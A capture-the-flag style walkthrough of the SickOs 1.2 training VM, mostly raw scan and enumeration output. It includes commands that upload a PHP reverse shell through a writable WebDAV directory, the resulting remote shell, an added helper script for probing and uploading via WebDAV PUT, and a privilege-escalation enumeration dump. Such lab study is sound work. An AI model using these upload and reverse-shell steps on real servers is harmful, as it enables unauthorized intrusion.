This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the SickOs 1.2 vulnerable VM:
https://www.vulnhub.com/entry/sickos-12,144/
Home-brewed tools used: https://github.com/iuristanchev/pentesting_tools
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.9 00:0c:29:98:f5:19 1 60 VMware, Inc.
Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
Nmap scan report for 192.168.1.9
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
| http-useragent-tester:
|
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
| WWW-Mechanize/1.34
|_
MAC Address: 00:0C:29:98:F5:19 (VMware)
Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT STATE SERVICE
80/tcp open http
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
| <!-- NOTHING IN HERE ///\\\ -->
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
|_ ///\\\ -->>>>
MAC Address: 00:0C:29:98:F5:19 (VMware)
amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 4 20:57:05 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.1.9:80/ ----
==> DIRECTORY: http://192.168.1.9:80/test/
+ http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)
---- Entering directory: http://192.168.1.9:80/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 04 Jan 2017 21:01:06 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.9 left intact
nc -nlvp 443
curl --upload-file /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0
* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5495
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 04 Jan 2017 21:43:01 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
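The upload step above, as an added example that is not part of the original writeup: a small shell helper that reads a WebDAV OPTIONS reply, lists the methods that let a client write into the directory, and wraps the PUT with the status check the curl call above lacks. The reply embedded in the script is constructed from the lighttpd 1.4.28 response shown above; the function names are this example's, and dav_options/dav_put need a live target and are not exercised here. HTTP/1.0 is forced for the same reason the writeup passed -0 and --http1.0 (they are the same curl flag): for an HTTP/1.1 upload curl adds an Expect: 100-continue header, and lighttpd 1.4.28 answers any Expect header with 417 Expectation Failed; sending -H 'Expect:' is the other way around it.

```shell
#!/bin/sh
# Added example, not from the original writeup: decide from an OPTIONS reply
# whether a WebDAV directory is writable, then upload with a status check.
# Function names are this example's.

# Methods that create or change server-side content. PROPFIND, LOCK and
# UNLOCK are read-only or bookkeeping and are left out.
DAV_WRITE_METHODS="PUT DELETE MKCOL MOVE COPY PROPPATCH"

# Constructed from the lighttpd 1.4.28 reply shown above (sample input).
SAMPLE_OPTIONS_REPLY='HTTP/1.1 200 OK
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Allow: OPTIONS, GET, HEAD, POST
Content-Length: 0
Server: lighttpd/1.4.28'

# dav_allowed_methods: read raw response headers on stdin and print the
# union of every Allow: header, one method per line, sorted and deduplicated
# (servers may split the list over several Allow headers, as lighttpd does).
dav_allowed_methods() {
    tr -d '\r' | awk -F': *' '
        tolower($1) == "allow" {
            n = split($2, m, /, */)
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' | sort -u
}

# dav_writable_methods: same input; print only the write methods that are
# enabled, in DAV_WRITE_METHODS order. Empty output means read-only.
dav_writable_methods() {
    allowed=$(dav_allowed_methods)
    for m in $DAV_WRITE_METHODS; do
        if printf '%s\n' "$allowed" | grep -qx "$m"; then
            printf '%s\n' "$m"
        fi
    done
}

# dav_options URL: fetch the live OPTIONS reply (status line and headers)
# to feed into the functions above. Not run here; needs a target.
dav_options() {
    curl -sS -i -X OPTIONS "$1"
}

# dav_put URL FILE: upload FILE and fail unless the server reports 201
# (created) or 204 (overwritten). HTTP/1.0 is forced because for HTTP/1.1
# uploads curl adds "Expect: 100-continue", which lighttpd 1.4.28 answers
# with 417 Expectation Failed; -H 'Expect:' would also work. Not run here.
dav_put() {
    code=$(curl -sS --http1.0 -o /dev/null -w '%{http_code}' --upload-file "$2" "$1")
    case "$code" in
        201|204) echo "uploaded $1 (HTTP $code)" ;;
        *) echo "PUT $1 failed (HTTP $code)" >&2; return 1 ;;
    esac
}

# Stand-alone run: what the sample reply lets a client do.
printf '%s\n' "$SAMPLE_OPTIONS_REPLY" | dav_writable_methods
```

Against a live target the flow is `dav_options http://192.168.1.9/test/ | dav_writable_methods`, and if PUT is listed, `dav_put http://192.168.1.9/test/shell.php php-reverse-shell.txt` with the listener already running. A 201 only proves the file landed; that PHP executes in that directory is a separate question, answered by requesting the file.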
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
13:43:47 up 1:30, 0 users, load average: 0.02, 0.04, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$
python -c 'import pty; pty.spawn("/bin/sh")'
cat /etc/debian_version
wheezy/sid
uname -v
#25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#
Debug Info
thorough tests = disabled
Scan started at:
Thu Jan 5 09:43:36 PST 2017
### SYSTEM ##############################################
Kernel information:
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
Kernel information (continued):
Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
NAME="Ubuntu"
VERSION="12.04.4 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
VERSION_ID="12.04"
Hostname:
ubuntu
### USER/GROUP ##########################################
Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Users that have previously logged onto the system:
Username Port From Latest
root pts/0 192.168.0.100 Tue Apr 26 03:57:15 -0700 2016
john tty1 Wed Mar 30 05:09:38 -0700 2016
All users and uid/gid info:
root:x:0:0
daemon:x:1:1
bin:x:2:2
sys:x:3:3
sync:x:4:65534
games:x:5:60
man:x:6:12
lp:x:7:7
mail:x:8:8
news:x:9:9
uucp:x:10:10
proxy:x:13:13
www-data:x:33:33
backup:x:34:34
list:x:38:38
irc:x:39:39
gnats:x:41:41
nobody:x:65534:65534
libuuid:x:100:101
syslog:x:101:103
messagebus:x:102:104
john:x:1000:1000
sshd:x:103:65534
Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
Super user account(s):
root
Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 30 2016 .
drwxr-xr-x 22 root root 4.0K Mar 30 2016 ..
drwxr-xr-x 3 john john 4.0K Apr 12 2016 john
Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
Path information:
/sbin:/bin:/usr/sbin:/usr/bin
Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
Current umask value:
0000
u=rwx,g=rwx,o=rwx
umask value as specified in /etc/login.defs:
UMASK 022
Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
-rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
-rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
-rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 730 Sep 13 2013 apt-xapian-index
-rwxr-xr-x 1 root root 907 Dec 28 2012 man-db
Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:0c:29:98:f5:19
inet addr:192.168.1.9 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:268 errors:0 dropped:0 overruns:0 frame:0
TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:142432 (142.4 KB) TX bytes:22042 (22.0 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Nameserver(s):
nameserver 192.168.1.1
Default route:
default 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.9:56045 192.168.1.20:443 ESTABLISHED 984/php-cgi
tcp 0 0 192.168.1.9:80 192.168.1.20:48676 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:68 0.0.0.0:* -
### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.5 0.1 3396 1832 ? Ss 09:41 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 09:41 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 09:41 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:0]
root 5 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/0:0H]
root 6 0.1 0.0 0 0 ? S 09:41 0:00 [kworker/u16:0]
root 7 0.0 0.0 0 0 ? S 09:41 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_sched]
root 10 0.0 0.0 0 0 ? S 09:41 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 09:41 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 09:41 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 09:41 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 09:41 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 09:41 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 09:41 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/u17:0]
root 18 0.0 0.0 0 0 ? S< 09:41 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 09:41 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 09:41 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 09:41 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 09:41 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 09:41 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 09:41 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 09:41 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? SN 09:41 0:00 [khugepaged]
root 29 0.0 0.0 0 0 ? S 09:41 0:00 [fsnotify_mark]
root 30 0.0 0.0 0 0 ? S 09:41 0:00 [ecryptfs-kthrea]
root 31 0.0 0.0 0 0 ? S< 09:41 0:00 [crypto]
root 43 0.0 0.0 0 0 ? S< 09:41 0:00 [kthrotld]
root 44 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:1]
root 45 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_1]
root 47 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:2]
root 48 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:3]
root 49 0.0 0.0 0 0 ? S< 09:41 0:00 [dm_bufio_cache]
root 50 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:4]
root 69 0.0 0.0 0 0 ? S< 09:41 0:00 [deferwq]
root 70 0.0 0.0 0 0 ? S< 09:41 0:00 [charger_manager]
root 71 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:2]
root 193 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt_poll_0]
root 208 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt/0]
root 220 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_2]
root 221 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_3]
root 227 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_4]
root 229 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_5]
root 231 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_6]
root 232 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_7]
root 233 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_8]
root 234 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_9]
root 237 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_10]
root 238 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_11]
root 239 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_12]
root 240 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_13]
root 241 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_14]
root 242 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_15]
root 243 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_16]
root 244 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_17]
root 245 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_18]
root 246 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_19]
root 247 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_20]
root 248 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_21]
root 249 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_22]
root 250 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_23]
root 251 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_24]
root 252 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_25]
root 253 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_26]
root 254 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_27]
root 255 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_28]
root 256 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_29]
root 257 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_30]
root 258 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_31]
root 259 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:5]
root 260 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:6]
root 261 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:7]
root 262 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:8]
root 263 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:9]
root 264 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:10]
root 265 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:11]
root 266 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:12]
root 267 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:13]
root 268 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:14]
root 269 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:15]
root 270 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:16]
root 271 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:17]
root 272 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:18]
root 273 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:19]
root 274 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:20]
root 275 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:21]
root 276 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:22]
root 277 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:23]
root 278 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:24]
root 279 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:25]
root 280 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:26]
root 281 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:27]
root 282 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:28]
root 283 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:29]
root 284 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:30]
root 285 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:31]
root 286 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_32]
root 287 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:32]
root 379 0.0 0.0 0 0 ? S 09:41 0:00 [jbd2/sda1-8]
root 380 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-rsv-conver]
root 381 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-unrsv-conv]
root 469 0.0 0.0 2832 608 ? S 09:41 0:00 upstart-udev-bridge --daemon
root 471 0.0 0.1 3080 1296 ? Ss 09:41 0:00 /sbin/udevd --daemon
102 547 0.0 0.0 3256 652 ? Ss 09:41 0:00 dbus-daemon --system --fork --activation=upstart
syslog 557 0.1 0.1 30036 1472 ? Sl 09:41 0:00 rsyslogd -c5
root 622 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 623 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 642 0.0 0.0 0 0 ? S< 09:41 0:00 [ttm_swap]
root 706 0.0 0.0 0 0 ? S< 09:41 0:00 [kpsmoused]
root 752 0.0 0.0 2844 348 ? S 09:41 0:00 upstart-socket-bridge --daemon
root 797 0.0 0.0 2924 404 ? Ss 09:41 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 819 0.0 0.2 6680 2400 ? Ss 09:41 0:00 /usr/sbin/sshd -D
root 899 0.0 0.0 4628 840 tty4 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty4
root 903 0.0 0.0 4628 836 tty5 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty5
root 907 0.0 0.0 4628 844 tty2 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty2
root 908 0.0 0.0 4628 832 tty3 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty3
root 912 0.0 0.0 4628 836 tty6 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty6
root 920 0.0 0.0 2616 884 ? Ss 09:41 0:00 cron
daemon 921 0.0 0.0 2468 348 ? Ss 09:41 0:00 atd
www-data 966 0.0 0.2 8272 2236 ? S 09:41 0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
www-data 968 0.0 0.4 17844 4720 ? Ss 09:41 0:00 /usr/bin/php-cgi
www-data 982 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 983 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 984 0.0 0.2 18100 3072 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 985 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
root 1003 0.0 0.0 4628 836 tty1 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty1
root 1187 0.0 0.0 22584 564 ? Ssl 09:41 0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
root 1206 0.1 0.5 11268 5660 ? S 09:41 0:00 /usr/sbin/vmtoolsd
root 1230 0.0 0.7 14736 7840 ? S 09:41 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data 1243 0.0 0.0 2232 544 ? S 09:41 0:00 sh -c uname -a; w; id; /bin/bash -i
www-data 1247 0.0 0.1 3448 1708 ? S 09:41 0:00 /bin/bash -i
www-data 3185 0.2 0.1 3412 1428 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3467 0.0 0.0 3384 644 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3468 0.0 0.1 2860 1032 ? R 09:43 0:00 ps aux
Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 920788 Mar 28 2013 /bin/bash
-rwxr-xr-x 2 root root 26696 Mar 29 2012 /sbin/getty
-rwxr-xr-x 1 root root 194528 Jan 18 2013 /sbin/init
-rwxr-xr-x 1 root root 177552 Jul 19 2013 /sbin/udevd
lrwxrwxrwx 1 root root 25 Apr 12 2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
-rwxr-xr-x 1 root root 187332 Dec 20 2011 /usr/sbin/lighttpd
-rwxr-xr-x 1 root root 531776 Jan 13 2016 /usr/sbin/sshd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader
/etc/init.d/ binary permissions:
total 144
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 0 Mar 30 2016 .legacy-bootordering
-rw-r--r-- 1 root root 2427 Jul 26 2012 README
-rwxr-xr-x 1 root root 4596 Sep 25 2012 apparmor
lrwxrwxrwx 1 root root 21 Oct 25 2011 atd -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2444 Jul 26 2012 bootlogd
lrwxrwxrwx 1 root root 21 Apr 19 2012 console-setup -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 19 2012 cron -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 13 2013 dbus -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Nov 26 2013 dmesg -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1242 Dec 13 2011 dns-clean
lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1105 Dec 15 2015 grub-common
-rwxr-xr-x 1 root root 1329 Jul 26 2012 halt
lrwxrwxrwx 1 root root 21 May 26 2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock -> /lib/init/upstart-job
